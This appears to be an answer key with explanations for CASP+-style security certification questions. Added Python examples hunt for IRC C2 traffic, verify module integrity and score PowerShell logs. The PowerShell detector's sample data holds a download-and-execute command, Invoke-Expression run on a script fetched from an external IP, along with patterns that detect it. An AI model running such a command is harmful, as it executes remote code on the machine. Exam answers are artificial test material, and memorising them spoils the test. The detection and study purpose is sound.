Latest Update: Jun 22 2026
Correct Answer: C
A is incorrect: A SQL injection attack could explain unauthorized access to a database-backed system, but the observed telemetry does not fit a live SQLi exfiltration pattern. The evidence shows a long-lived outbound TCP/6667 session with the payload JOIN #community, which is characteristic of IRC-style command-and-control, not database query abuse. CASP+ materials treat SQL injection as a web-application attack against backend data stores, whereas this scenario points to persistent malware communications rather than direct query-based exfiltration.
B is incorrect: Cryptocurrency mining malware typically causes sustained CPU or GPU utilization, abnormal system performance, and outbound connections to mining pools using mining protocols. The evidence here instead shows a persistent connection on TCP/6667 with very small periodic communications and an IRC-style JOIN command. That traffic pattern is much more consistent with a compromised host maintaining low-volume command-and-control communications than with mining activity.
C is correct: This is the best answer. The persistent TCP/6667 connection and the ASCII payload JOIN #community strongly indicate Internet Relay Chat (IRC) communications. CASP+ references identify instant messaging channels as potential carriers for malware, including backdoor Trojan horses, and note that such tools can be used for hijacking and unauthorized control. A long-lived outbound IRC session from a database server to an unknown external IP, especially after the administrator logged out, is most consistent with a botnet Trojan maintaining command-and-control access.
D is incorrect: This is not the best answer because the facts do not support legitimate administrator activity. The dbadmin session ended at 8:05 a.m., but the suspicious connection established at 7:55 a.m. remained active long afterward, with periodic low-volume traffic. Also, a database server maintaining an external IRC session to an unknown address is inconsistent with normal administrative support behavior. The evidence indicates persistence and covert communications, not a human administrator casually seeking help.
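The hunting logic behind this answer, as an added example that is not part of the exam material: it flags sessions that are IRC-like (port or first command), long-lived, low-volume, and still alive after the administrator's logoff. All flow records, hostnames and addresses below are constructed.

```python
"""Hunt for the telemetry pattern in the scenario: a long-lived outbound
session on an IRC port, tiny periodic payloads, an IRC command in the
first bytes, and persistence past the administrator's logoff.
Added example; the flow records, hosts and addresses are constructed."""
import re
from dataclasses import dataclass
from datetime import datetime, timedelta

IRC_PORTS = {6667, 6668, 6669, 6697}          # plain and TLS IRC
IRC_CMD = re.compile(rb"^(NICK|USER|JOIN|PRIVMSG|PONG) ")

@dataclass
class Flow:
    host: str
    dst_ip: str
    dst_port: int
    start: datetime
    last_seen: datetime
    bytes_per_min: float       # average payload rate; beacons are tiny
    first_payload: bytes       # first bytes the sensor captured

def irc_c2_suspects(flows, admin_logoff, min_age=timedelta(hours=1), max_rate=200.0):
    """Return (host, dst, first command) for flows that look like IRC C2."""
    findings = []
    for f in flows:
        irc_like = f.dst_port in IRC_PORTS or IRC_CMD.match(f.first_payload) is not None
        long_lived = f.last_seen - f.start >= min_age
        low_volume = f.bytes_per_min <= max_rate
        # A session that survives the operator's logoff is not a human chatting.
        outlived_admin = f.last_seen > admin_logoff
        if irc_like and long_lived and low_volume and outlived_admin:
            first_line = f.first_payload.split(b"\r\n", 1)[0].decode("ascii", "replace")
            findings.append((f.host, f"{f.dst_ip}:{f.dst_port}", first_line))
    return findings

def _t(hhmm):
    """Constructed timestamps, all on one day."""
    return datetime(2026, 6, 22, *map(int, hhmm.split(":")))

SAMPLE_FLOWS = [
    # The scenario's flow: established 07:55, still beaconing at noon.
    Flow("dbsrv01", "203.0.113.45", 6667, _t("07:55"), _t("12:10"), 35.0,
         b"JOIN #community\r\n"),
    # Normal patch download: short, bulky, ends before logoff.
    Flow("dbsrv01", "198.51.100.20", 443, _t("07:58"), _t("08:01"), 48000.0,
         b"\x16\x03\x03"),
    # Backup agent: long-lived but high volume, and not IRC.
    Flow("dbsrv01", "10.20.0.5", 10000, _t("06:00"), _t("12:00"), 9000.0,
         b"BKUP/1.0"),
]
ADMIN_LOGOFF = _t("08:05")   # dbadmin session ended at 8:05 a.m.

def demo():
    return irc_c2_suspects(SAMPLE_FLOWS, ADMIN_LOGOFF)

if __name__ == "__main__":
    print(demo())
```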
Correct Answer: A
A is correct: This is correct. One of the primary concerns organizations and partners have regarding cloud environments is multitenancy, where multiple customers share the same underlying infrastructure. This can raise concerns about data leakage, unauthorized access, or insufficient isolation between tenants. By designing strong data protection schemes—such as encryption, tenant isolation controls, strict access management, and segmentation—the company can demonstrate that risks associated with multitenancy are mitigated. From a CASP+ governance perspective, addressing the partners’ primary security concerns through compensating technical controls is the most effective way to gain agreement during contract renegotiation. Demonstrating how confidentiality and isolation are preserved in the cloud environment directly supports the negotiation objective.
B is incorrect: This is incorrect. Implementing redundant stores and services across multiple cloud service providers improves availability and resilience, ensuring systems remain operational even if one provider experiences an outage. While this can be an important architectural design choice for business continuity, the scenario centers on partners’ concerns about processing and storing sensitive data in the cloud under NDA restrictions. High availability does not directly address the confidentiality or isolation risks that typically drive contractual limitations on cloud storage. Therefore, this option is not the most relevant argument to gain partner consensus.
C is incorrect: This is incorrect. Emulating operating systems and hardware architectures to obscure operations from the cloud provider does not represent a standard or practical approach to addressing contractual or security concerns related to cloud adoption. While some forms of virtualization or obfuscation might reduce visibility into workloads, this approach does not directly provide assurance about data protection, confidentiality, or governance. Partners evaluating NDA compliance are more likely to focus on well-defined security controls such as encryption, isolation, and access management rather than architectural obfuscation techniques.
D is incorrect: This is incorrect. File Integrity Monitoring detects and alerts on unauthorized modifications to files. While this control improves security monitoring and helps maintain data integrity, it does not address the broader concerns related to storing sensitive data in cloud environments under NDA restrictions. The partners’ hesitation is likely related to data exposure risks, multitenancy, and control over protected information, not solely to file modification events. As a result, FIM alone would not be sufficient to convince partners to allow the data to be processed or stored in the cloud.
Correct Answer: B
A is incorrect: Manual cable inspection involves physically examining network cables and connections to identify hardware faults or connectivity issues. This activity supports network maintenance but has no role in monitoring account behavior or detecting anomalies in system activity. It cannot establish behavioral baselines for service accounts.
B is correct: Behavioral analytics analyzes historical activity patterns for users and service accounts to establish a baseline of normal behavior. By applying statistical models or machine learning, security tools can identify deviations such as unusual login times, abnormal API usage, or unexpected resource access. CASP security operations guidance highlights behavioral analytics as a key method for detecting insider threats and compromised accounts by identifying anomalies relative to established baselines.
C is incorrect: Static route review involves examining manually configured routing entries within network infrastructure. While useful for troubleshooting routing issues or verifying network configurations, it does not provide insight into authentication behavior or service account usage patterns. Therefore, it cannot detect deviations in account activity.
D is incorrect: Disk wiping is a data sanitization technique used to permanently remove data from storage devices prior to disposal or reuse. This process protects against data recovery but does not provide monitoring or analytics capabilities related to service account activity or anomaly detection.
Select all that apply
Correct Answers: A, C
A is correct: Code signing provides cryptographic assurance that software originates from a trusted publisher and has not been modified since it was signed. The developer signs the program using a private key associated with a certificate issued by a trusted certificate authority. When users or systems validate the signature, they can confirm both the publisher’s identity and the integrity of the code. CASP+ materials emphasize code signing as a primary control to protect software distribution channels and ensure that malicious actors cannot modify application modules without invalidating the signature.
B is incorrect: Certificate-based authentication is primarily used to authenticate users, systems, or services in secure communications. For example, it is commonly implemented in TLS, VPNs, or mutual authentication scenarios where identity verification is required. While certificates are involved in code signing, certificate-based authentication itself does not ensure the integrity of individual modules within a program. The purpose here is authentication of entities, not integrity protection of software artifacts.
C is correct: Hashing mechanisms allow developers or systems to verify that files have not been altered. By generating and comparing hashes for each module, a developer can detect whether the code has been modified after distribution. Although MD5 is considered weak for cryptographic security due to collision vulnerabilities, it still illustrates the concept of verifying integrity through hashing. CASP+ guidance highlights the use of hashing functions to ensure file integrity validation, which directly aligns with the objective of detecting unauthorized modification of program modules.
D is incorrect: Compressing a program with a password protects the archive during storage or transmission but does not provide strong integrity guarantees once the program is extracted. A password-protected archive does not prevent the executable code from being altered after extraction, nor does it provide cryptographic verification that the code has remained unchanged. Therefore, this option does not effectively protect program modules from malicious modification.
E is incorrect: Encrypting the program with 3DES would protect confidentiality of the code while stored or transmitted, but encryption alone does not provide verification that the code has not been altered after decryption. Integrity validation requires hashing or digital signatures. Additionally, 3DES is considered legacy encryption and is gradually being deprecated in modern cryptographic practices. Consequently, encryption alone does not directly address the developer’s need to ensure that modules cannot be modified unnoticed.
F is incorrect: Making the discretionary access control list (DACL) read-only would restrict permissions on a file or directory, but it does not cryptographically guarantee integrity. Access control mechanisms can be bypassed by privileged users or compromised systems. CASP+ exam logic typically favors cryptographic integrity controls over purely administrative file permissions when the requirement is to ensure that software code cannot be altered without detection. Therefore, this option does not sufficiently protect code integrity.
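How options A and C work together, as an added example that is not part of the exam material: per-module hashes (option C) detect a modified module, and a signature over the hash list (the role of code signing in option A) stops an attacker from simply regenerating the hashes. SHA-256 is used instead of the MD5 mentioned in the question, the module bytes and publisher key are constructed, and an HMAC stands in for a certificate-backed signature.

```python
"""Integrity manifest for program modules plus an authenticated manifest.
Added example; module contents and the publisher key are constructed, and
HMAC is a stand-in for a real code-signing signature."""
import hashlib
import hmac
import json

def build_manifest(modules: dict) -> dict:
    # SHA-256 rather than MD5: MD5 collisions let an attacker craft two
    # modules with the same digest, which would defeat this check.
    return {name: hashlib.sha256(data).hexdigest()
            for name, data in sorted(modules.items())}

def find_modified(modules: dict, manifest: dict) -> list:
    """Modules whose hash differs from the manifest, plus any that are
    missing or were added without being listed."""
    current = build_manifest(modules)
    return sorted(name for name in set(current) | set(manifest)
                  if current.get(name) != manifest.get(name))

def sign_manifest(manifest: dict, key: bytes) -> str:
    # Canonical JSON so the same manifest always produces the same tag.
    canonical = json.dumps(manifest, sort_keys=True, separators=(",", ":")).encode()
    return hmac.new(key, canonical, hashlib.sha256).hexdigest()

def manifest_is_authentic(manifest: dict, tag: str, key: bytes) -> bool:
    # compare_digest keeps the comparison constant-time.
    return hmac.compare_digest(sign_manifest(manifest, key), tag)

def verify_release(modules: dict, manifest: dict, tag: str, key: bytes) -> dict:
    """Reject an unauthenticated manifest outright; otherwise report the
    modules that no longer match it."""
    if not manifest_is_authentic(manifest, tag, key):
        return {"manifest_trusted": False, "modified": []}
    return {"manifest_trusted": True, "modified": find_modified(modules, manifest)}

# Constructed release: three modules signed by the publisher at build time.
RELEASE = {"core.dll": b"core v1.2", "net.dll": b"net v1.2", "ui.dll": b"ui v1.2"}
PUBLISHER_KEY = b"constructed-demo-key"
MANIFEST = build_manifest(RELEASE)
TAG = sign_manifest(MANIFEST, PUBLISHER_KEY)

def demo_tampered_module() -> dict:
    """One module altered after distribution; the manifest is untouched."""
    installed = dict(RELEASE, **{"net.dll": b"net v1.2 + implant"})
    return verify_release(installed, MANIFEST, TAG, PUBLISHER_KEY)

def demo_rehashed_manifest() -> dict:
    """Module altered and hash list regenerated, but the original tag
    cannot be reproduced without the publisher key."""
    installed = dict(RELEASE, **{"net.dll": b"net v1.2 + implant"})
    forged = build_manifest(installed)
    return verify_release(installed, forged, TAG, PUBLISHER_KEY)

if __name__ == "__main__":
    print(demo_tampered_module())
    print(demo_rehashed_manifest())
```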
Correct Answer: B
A is incorrect: Pricing for additional services may appear in commercial agreements or master service agreements (MSAs), but it is not the primary focus of a Service Level Agreement. An SLA specifically defines measurable service expectations rather than pricing structures. Pricing is usually handled in separate contractual sections or procurement agreements.
B is correct: Performance metrics are the most common and defining component of a Service Level Agreement (SLA). An SLA establishes measurable service objectives such as uptime percentage, latency thresholds, response times, and availability targets. CASP+ governance guidance indicates that SLAs include clearly defined metrics used to evaluate whether the service provider is meeting the agreed service quality levels. These metrics allow both parties to monitor performance and determine compliance with contractual service commitments.
C is incorrect: An SLA typically defines responsibilities for both the service provider and the customer, not only the provider. It clarifies roles, escalation procedures, and expectations for both parties to ensure the agreed service levels can be achieved. Therefore, describing only the provider’s responsibility would not accurately represent a typical SLA structure.
D is incorrect: Limitation of liability clauses are commonly found in legal contracts between organizations and service providers, but they are not the defining or most common functional component of a network SLA. Such clauses are generally part of broader contractual agreements rather than the operational service performance portion of the SLA.
E is incorrect: Confidentiality and non-disclosure clauses are important legal protections in many contracts, particularly when sensitive information may be shared between organizations. However, these clauses are usually defined in separate non-disclosure agreements (NDAs) or master service agreements rather than representing the central purpose of an SLA, which is to define measurable service performance commitments.
Correct Answer: C
A is incorrect: This is incorrect. Maintaining an on-premises backup environment could provide an additional recovery option if the cloud provider fails. However, this approach introduces significant operational complexity and partially undermines the benefits of digital transformation to the cloud. It also does not directly address resiliency within the cloud service model or guarantee SLA compliance during a cloud provider incident. From an architectural perspective, hybrid failback to on-premises infrastructure is generally less efficient than using distributed cloud architectures designed for resilience.
B is incorrect: This is incorrect. A round-robin load balancer distributes traffic across multiple servers to improve performance and availability. However, this solution only provides resilience within a single environment or provider. If the cloud service provider itself experiences a major outage, the load balancer cannot redirect traffic outside of that provider’s infrastructure. Therefore, it does not sufficiently address the concern of maintaining service availability during a CSP-level incident.
C is correct: This is correct. A multicloud architecture uses services from multiple cloud providers, which significantly reduces dependency on any single provider. If one CSP experiences an outage or service disruption, workloads can continue operating on another provider’s infrastructure. This approach directly mitigates provider-level failure risks and helps organizations meet strict service-level agreement requirements. From a resilience and risk management perspective, distributing workloads across multiple CSPs provides stronger protection against large-scale outages affecting a single provider.
D is incorrect: This is incorrect. Active-active deployments within the same tenant can improve application availability by distributing workloads across multiple instances or regions within the same cloud provider. While this increases redundancy at the infrastructure or application level, it does not mitigate the risk of a provider-wide outage. Because the organization’s concern specifically involves a CSP incident affecting SLA commitments, relying solely on redundancy within one provider does not fully address the risk.
Correct Answer: C
A is incorrect: A worm is a type of malware that self-replicates and spreads automatically across networks without requiring user interaction. Worms typically exploit vulnerabilities to propagate between systems and often leave artifacts such as files, processes, or network traffic patterns that can be detected by antivirus or intrusion detection tools. In the scenario, the attack involved a PowerShell command using Invoke-Expression to execute an external script, and a disk scan revealed no indicators of compromise (IOCs). This suggests the malware did not rely on persistent files on disk, which is inconsistent with typical worm behavior. Therefore, worm malware does not best describe the attack observed.
B is incorrect: A logic bomb is malicious code that remains dormant within a system until specific conditions are met, such as a certain date, time, or triggering event. Logic bombs are typically embedded within legitimate software or scripts and activate only when predefined criteria occur. While logic bombs can cause significant damage once triggered, the scenario describes malware that actively executed a remote script through PowerShell. There is no indication of conditional activation or delayed execution based on triggers, which are the defining characteristics of logic bombs. Therefore, this option does not match the behavior described.
C is correct: Fileless malware is malicious code that operates primarily in system memory and leverages legitimate tools—such as PowerShell, Windows Management Instrumentation (WMI), or other system utilities—to execute attacks without writing traditional malicious files to disk. Because fileless malware often executes directly in memory, standard antivirus disk scans frequently fail to detect indicators of compromise. The scenario specifically mentions the use of PowerShell Invoke-Expression to execute an external malicious script, followed by an antivirus scan that found no artifacts on disk. This behavior strongly aligns with fileless malware techniques, which exploit built-in system tools and avoid leaving persistent files. Therefore, the security solution should focus on detecting and preventing fileless attacks through behavioral monitoring, memory analysis, and endpoint detection capabilities.
D is incorrect: A rootkit is a type of malware designed to hide its presence and maintain privileged access to a system by modifying operating system components, drivers, or kernel modules. Rootkits typically provide persistent stealth capabilities and may conceal files, processes, or network activity from security tools. While rootkits can evade detection, they usually involve deeper system-level modifications and persistence mechanisms rather than simply executing malicious scripts in memory via PowerShell. The scenario does not indicate kernel manipulation or persistence mechanisms typical of rootkits, making this option less appropriate than fileless malware.
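The behavioral monitoring the correct answer calls for, as an added example that is not part of the exam material: it scores PowerShell script block records for remotely fetched content handed to Invoke-Expression, which a disk scan cannot see. The records are constructed and mimic the fields of Windows event 4104.

```python
"""Behavioural detection for the fileless pattern in the scenario.
Added example; the script block records, hosts and URL are constructed."""
import re

# Cmdlet and alias that evaluate a string as code.
EVAL = re.compile(r"\b(Invoke-Expression|iex)\b", re.IGNORECASE)
# Cmdlets and methods that pull content from the network.
FETCH = re.compile(r"(DownloadString|DownloadData|Invoke-WebRequest|iwr|Invoke-RestMethod|irm)\b",
                   re.IGNORECASE)
# Base64 command lines hide the same pattern from a plain string search.
ENCODED = re.compile(r"-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{40,}", re.IGNORECASE)

def score_script_block(script: str) -> tuple:
    """Return (severity 0-3, matched behaviours) for one script block."""
    hits = []
    if EVAL.search(script):
        hits.append("dynamic-eval")
    if FETCH.search(script):
        hits.append("network-fetch")
    if ENCODED.search(script):
        hits.append("encoded-command")
    # Fetch feeding eval is the download-and-execute pattern from the
    # scenario; eval alone is common in admin scripts and rates low.
    if "dynamic-eval" in hits and "network-fetch" in hits:
        return 3, hits
    if "encoded-command" in hits:
        return 2, hits
    return (1, hits) if hits else (0, hits)

def triage(events) -> list:
    """Records with severity >= 2, highest first: (severity, host, user, behaviours)."""
    out = []
    for ev in events:
        sev, hits = score_script_block(ev["script_block"])
        if sev >= 2:
            out.append((sev, ev["host"], ev["user"], hits))
    return sorted(out, reverse=True)

# Constructed 4104-style records (ScriptBlockText shortened to script_block).
EVENTS = [
    {"host": "ws17", "user": "jsmith", "script_block":
        "Invoke-Expression (Invoke-WebRequest -Uri 'http://203.0.113.9/u.ps1' -UseBasicParsing).Content"},
    {"host": "ws02", "user": "ops", "script_block":
        "Invoke-Expression -Command 'Get-Service | Where-Object Status -eq Stopped'"},
    {"host": "ws09", "user": "build", "script_block":
        "Get-ChildItem C:\\build\\artifacts -Recurse | Measure-Object"},
]

if __name__ == "__main__":
    for finding in triage(EVENTS):
        print(finding)
```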
Correct Answer: B
A is incorrect: Covered parking can reduce visual observation of personnel entering or exiting vehicles. However, the scenario concerns competitors tracking personnel, which is typically accomplished through digital means such as GPS signals, mobile devices, or wearable technologies rather than visual surveillance. While covered parking may reduce physical visibility, it does not prevent location tracking through electronic devices that transmit geolocation data.
B is correct: Geofencing can enforce location-based policies on mobile devices and wearable technologies. By configuring geofencing controls to disable or restrict devices when they enter the vicinity of the secure facility, the organization can prevent location data from being transmitted to external services. This reduces the risk that competitors could track employee movement through mobile applications, GPS-enabled wearables, or other location-aware devices. Because the concern is personnel being tracked electronically when accessing the facility, geofencing is the most effective mitigation.
C is incorrect: Constructing a tunnel between the headquarters and the facility would reduce visibility of employees traveling between the two locations. However, building such infrastructure would be extremely expensive and does not address the primary tracking mechanism, which is likely to involve mobile device location services. Even if employees traveled through a tunnel, their devices could still broadcast location data outside the facility. Therefore, this option is impractical and does not effectively mitigate the risk described.
D is incorrect: Physical security measures such as access control vestibules, fencing, and perimeter barriers help prevent unauthorized entry into a facility and protect against physical intrusion. While these controls improve facility security, they do not address the specific concern of competitors tracking personnel through digital location services or mobile devices. Therefore, they do not mitigate the risk described in the scenario.
Correct Answer: A
A is correct: This is correct. Endpoint Detection and Response solutions provide advanced monitoring, behavioral analysis, and threat detection capabilities on endpoints. Unlike traditional antivirus tools that rely primarily on signatures, EDR platforms detect suspicious activity, malware behavior, and indicators of compromise in real time. They also support automated containment, forensic investigation, and response capabilities. In the scenario, malware caused service outages and impacted a remote executive device. EDR would improve visibility into endpoint activity and allow faster detection and containment of advanced malware threats, making it a stronger control for preventing further endpoint disruption.
B is incorrect: This is incorrect. Removing the web proxy and replacing it with a Unified Threat Management appliance would modify the perimeter security architecture but would not directly address the malware affecting endpoints, especially for users working remotely. Additionally, the organization already has a web proxy protecting the edge network. The issue described is malware affecting endpoint systems rather than insufficient gateway security, so this change would not effectively mitigate the problem.
C is incorrect: This is incorrect. A deny list approach blocks known malicious files, domains, or processes. While it can provide some level of protection, deny lists are reactive and limited because they only block threats that are already known. Modern malware often changes signatures or behaviors to evade static block lists. Because the scenario involves new malware causing disruptions, relying on a deny list alone would not provide sufficient protection against evolving threats.
D is incorrect: This is incorrect. Adding a firewall module to the existing antivirus may provide additional network filtering at the host level, but it does not significantly improve malware detection capabilities. The root issue is malware infection affecting endpoints, which requires improved threat detection and response capabilities rather than basic network filtering. Compared with advanced endpoint detection technologies, a firewall module offers limited protection against sophisticated or unknown malware.
Correct Answer: C
A is incorrect: A. Steganography. Steganography is the technique of hiding information inside another file, such as embedding secret data within images, audio, or documents so that the presence of the hidden data is not obvious. While this method conceals information, it is primarily used for covert communication rather than intellectual property protection. The scenario requires embedding proof of ownership within a document to support copyright claims. Steganography focuses on secrecy rather than establishing verifiable ownership or copyright attribution, so it is not the best choice for this purpose.
B is incorrect: B. E-signature. An electronic signature provides a method of digitally signing documents to confirm identity and approval of the contents. It is typically used in legal agreements or transactions to validate that a specific individual has approved or authorized a document. However, e-signatures are visible attributes associated with authentication and nonrepudiation rather than hidden indicators of ownership. The requirement in the scenario is to embed a covert sign of ownership without adding visible identifying attributes, which an e-signature does not accomplish.
C is correct: C. Watermarking. This is the correct answer because digital watermarking embeds ownership information within the document itself in a way that may not be immediately visible or easily removed. Watermarks can be designed to be imperceptible to normal users while still allowing the owner to prove authorship or copyright ownership if the document is copied or distributed without authorization. Digital watermarking is commonly used to protect intellectual property such as images, documents, audio, and video by embedding ownership markers that remain associated with the content even if the file is redistributed.
D is incorrect: D. Cryptography. Cryptography is used to protect the confidentiality and integrity of information through encryption and related techniques. While cryptographic methods can secure a document during transmission or storage, they do not embed ownership information into the document itself. Once the document is decrypted, there is no persistent mechanism proving authorship or ownership embedded within the file. Therefore, cryptography does not meet the requirement to covertly embed a sign of ownership for copyright protection.
